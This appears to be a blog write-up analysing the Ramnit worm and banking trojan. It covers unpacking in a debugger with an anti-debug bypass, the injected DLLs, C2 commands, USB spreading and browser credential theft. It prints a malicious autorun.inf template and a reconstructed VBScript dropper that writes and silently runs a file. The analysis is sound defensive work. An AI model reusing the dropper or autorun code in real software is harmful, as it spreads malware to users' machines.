Post

Ramnit Analysis

Posted
Preview Image
By os1ris
8 min read
Ramnit Analysis
FilenameZeichnungen Muster.exe
Filesize1.97 MiB
Hashcfd13da57bb620ec32a6ad174d4d4cac2c715af8e7aaa57931574152f5fffdd9
Malware FamilyRamnit [Worm] [Trojan]

Executive Summary

The Ramnit installer employs dual-layer packing: a proprietary packer plus UPX compression. Upon execution, it unpacks its payload, replicates to system directories, and establishes persistence via registry autorun entries.

The installer’s core function involves injecting .dll into legitimate system or browser processes. These DLLs establish inter-process communication and fetch additional modules from their C&C infrastructure. Retrieved modules enable credential harvesting and banking session hijacking.

Observation

When checking the file. It is stated that the file was compressed or packed using unknown packer. It also stated the file using format of AutoIT version 3.XX

checking the entropy shows 7.63340 meaning the file is heavy packed

Unpack

Due to the system architecture of 32bit. The most suitable way to unpack is using x32dbg.

setted breakpoint on the loader

setted breakpoint on the loader

  • bp VirtualAlloc
  • bp VirtualProtect
  • bp CreateProcessInternalW
  • bp IsDebuggerPresent
  • bp WriteProcessMemory
  • bp NtResumeThread

on first stop. it will stop on CreateProcessInternalW and it will drop the file “mgr.exe”

on second run. it will stop on ZwResumeThread or NtResumeThread

open second x32dbg and attach the drop program (mgr.exe)

on first exe file . run again and it will stop on IsDebuggerPresent detected the antidebugging

back to attached “mgr.exe”. create few breakpoint shown below:

setted breakpoint

  • bp VirtualAlloc
  • bp VirtualProtect
  • bp CreateProcessInternalW
  • bp IsDebuggerPresent
  • bp WriteProcessMemory

run once it will stop on VirtualProtect twice before it get into allocate.

run again it stop on VirtualAlloc. at first the EAX will show gibberish hex.

back to the loader. hit ‘execute until return’ button, on the return of isDebugPresent API, change the loader EAX to 0 for bypass anti debugging. run again and it will stop on anti-debug for the second time. repeat the following process which is emptying the EAX to 0. and hit Run

back to “mgr.exe” hit run and when stopping on VirtualAlloc, follow the EAX to dump

if hitting virtualAlloc, keep hitting ‘execute until return’ button (1) and follow dump on eax. keep watching the dump return value.

it will later stop on VirtualProtect and the program will be shown on the dump

dump the process using xdbg or processhacker(need to follow the same address which is 0x1d0000)

after dump. checking the file, it is stated that the file is packed using UPX v3.0

the file can be unpacked now:

after unpacked:

Static Analysis

Ramnit uses custom packing then UPX to hide its payload, which unpacks to a clean PE that injects two DLLs (modules.dll and rmnsoft.dll) into processes; these DLLs communicate via named pipe and download additional modules/webinjects from C2 servers using TCP/DGA. In this analysis, we perform static analysis of the unpacks file.

Clean PE

Windows Privilege Thread [start]

on the start there several file that use Sedebugprivilege to turns on a specific Windows privilege for the current process so the program can perform higher-permission actions. Also, got a function called that created Mutex.

Notice it got two unk_4 .. it have two application that will be covered later

  • unk_404270: rmnsoft.dll
  • unk_415270: modules.dll

The routine coordinates ApplyExploit and CheckBypassed – if they both run successfully it creates two svchost.exe processes and writes rmnsoft.dll and modules.dll into them respectively.

Thread Execution Hijacking [sub_4026D8]

on sub_4026D8. This function suspends or resumes threads of a specific process.

  • a1 : a process ID (PID).
  • a2 : tells whether to suspend or resume the threads.

The code first gets the current thread ID using GetCurrentThreadId(). This is so it does not affect its own thread. Then it creates a snapshot of all threads in the system using CreateToolhelp32Snapshot.

To make it short, this function walks through every thread of a process and suspends or resumes them, except the current thread.

Locate Browser [sub_4016D6]

This function locates a web browser executable and stores the path in lpData. It attempts three methods in sequence:

Method 1: Default HTTP Handler

  • Registry key: HKEY_CLASSES_ROOT\http\shell\open\command
  • value: "C:\Program Files\Google\Chrome\Application\chrome.exe" -- "%1"
  • Validation: Rejects Chrome specifically, verifies file exists. If not, it will go to the other Environment below.

Method 2: IE Environment Path

  • Expands: %ProgramFiles%\Internet Explorer\iexplore.exe
  • Checks file existence

Method 3: IE Registry Path

  • Registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE

The deliberate Chrome exclusion suggests the malware targets browsers with weaker process isolation, as Chrome’s security architecture likely interferes with its injection techniques

rmnsoft.dll [unk_404270]

DLLEntryPoint

The key factor is what happens when the DLL loads into a process (fdwReason == 1, meaning DLL_PROCESS_ATTACH).

Documentation: https://learn.microsoft.com/en-us/windows/win32/dlls/dllmain

First it creates mutexes using CreateMutexA. This is used to make sure only one instance runs. If the mutex already exists, it calls ExitProcess.

Then it reads configuration from the Windows registry (RegOpenKeyExA, RegQueryValueExA). The value can replace lpReserved, which later becomes a file path or config input.

Next it launches multiple worker threads with CreateThread.

These threads perform different background tasks:

  • connect to google.com:80 (likely connectivity check or disguise traffic)
  • open network sockets
  • send an HTTP GET request
  • other background routines

After that it calls CreateFileA and repeatedly tries to open a file until it succeeds. This likely waits for a file or resource to appear.

GET Request [sub_10004F95]

on sub_10004F95, it builds an HTTP GET request to a host, sends it through a socket, receives the response for a limited time, and calculates the download speed (KB/s).

USB Worm [sub_1000A2D5]

in this function call(sub_1000A2D5) autorun.inf was created. It generated Autorun.inf Structure:

1
2
3
4
5
6
7

[autorun]
action=Open                                    ← Fake "safe" label
icon=%WinDir%\system32\shell32.dll,4           ← Legitimate Windows icon
shellexecute=[malware_path]                    ← Executes on double-click
shell\explore\command=[malware_path]           ← Hijacks "Explore" right-click
USEAUTOPLAY=1                                  ← Auto-triggers on insert
shell\Open\command=[malware_path]              ← Hijacks "Open" action

This is USB worm functionality

when a victim inserts the infected drive, Windows AutoPlay silently executes the malware. The junk data obfuscation and legitimate icon disguise it from casual inspection and basic AV scanning.

Persistent [sub_1000362F]

sub_1000362F reads a user folder path from the registry, builds a new path, copies a file there, and marks it hidden. The registry stored on following location:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

Token Build [sub_1000D1CB]

sub_1000D1CB. It initializes the malware runtime by setting up memory and networking, collecting host system identifiers (drive/volume data) to build a unique token, preparing configuration/storage files (complete.dat, dmlconf.dat)

  • %programfiles%\internet explorer\dmlconf.dat

Locating Directory [sub_100044E6]

sub_100044E6 builds a path in common system/user folders, appends lpString2 if given, ensures the directory exists, and returns the final path string.

C2 Communicating [sub_100069A8]

on sub_100069A8. following is what the other do:

  • getexec: download an executable file from a URL given by the C&C server, save it as [folder]\[subfolder]\[name].exe and execute it. Here, [folder] is a directory chosen by the method used when the second copy of the installer was made, while [subfolder] and [name] are two arguments of the command. Through this command, an arbitrary executable file distributed on any computer controlled by the gang behind Ramnit can be executed in the background on the victim’s computer. This has the capability to provide a pay-per-install service for other malware.
  • kos: shut down (kill) the operating system.
  • screen: take a screenshot and save it locally.
  • update: get the latest copy of the Ramnit installer from a URL given by the C&C server and replace the old Ramnit installer

if found, it queries the registry query of:

  • HKEY_LOCAL_MACHINE\Software\WASAntidot\Disable

If the key exists, it shows a message box of “Antidot is activate” if not, it dynamically loads SHDeleteKeyA from shlwapi.dll and attempts to delete certain registry branches (SOFTWARE, SYSTEM, HARDWARE) under different hives, after enabling backup/restore privileges.

So the registry part mainly checks a “disable” flag and can delete key paths if conditions allow.

VBScript Dropper [sub_10009F52]

It opens a file, writes the main data plus extra payload (like a VBScript dropper), appends metadata/obfuscation, sets the file hidden/system, and restores timestamps.

The Script (Beautifier)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

<SCRIPT Language="VBScript">
<!--

DropFileName = "svchost.exe"
WriteData = ""

Set FSO = CreateObject("Scripting.FileSystemObject")

' Build drop path (Temp folder)
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName

If FSO.FileExists(DropPath) = False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)

    ' Decode hex string into bytes
    For i = 1 To Len(WriteData) Step 2
        FileObj.Write Chr(CLng("&H" & Mid(WriteData, i, 2)))
    Next

    FileObj.Close
End If

Set WSHshell = CreateObject("WScript.Shell")

' Execute dropped file (hidden)
WSHshell.Run DropPath, 0

//-->
</SCRIPT>

<!---->
RmN

Self Replicate [sub_1000A49F]

function sub_1000A49F endlessly scans all drives, finds removable drives, then copies or creates files in the RECYCLER folder with disguised names and extensions, updates some internal metadata, and repeats every 10 seconds

basically spreading/mirroring itself to USB drives.

modules.dll [unk_415270]

C2 Server [sub_10006E43]

This is a core man-in-the-browser (MitB) function that intercepts HTTP requests, parses them for banking/financial data, and exfiltrates captured credentials to a command-and-control (C2) server.

Fake Redirect Response [sub_100043FE]

on sub_100043FE it operate fake redirect responses

Structure:

1
2
3
4
5
6
7
8
9
10
11

HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: max-age=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html
Location: <value from a1>

Date: <generated date>
Last-Modified: <generated date>

APPENDIX

pain of Defender

Malware Analysis
Malware Analysis
This post is licensed under CC BY 4.0 by the author.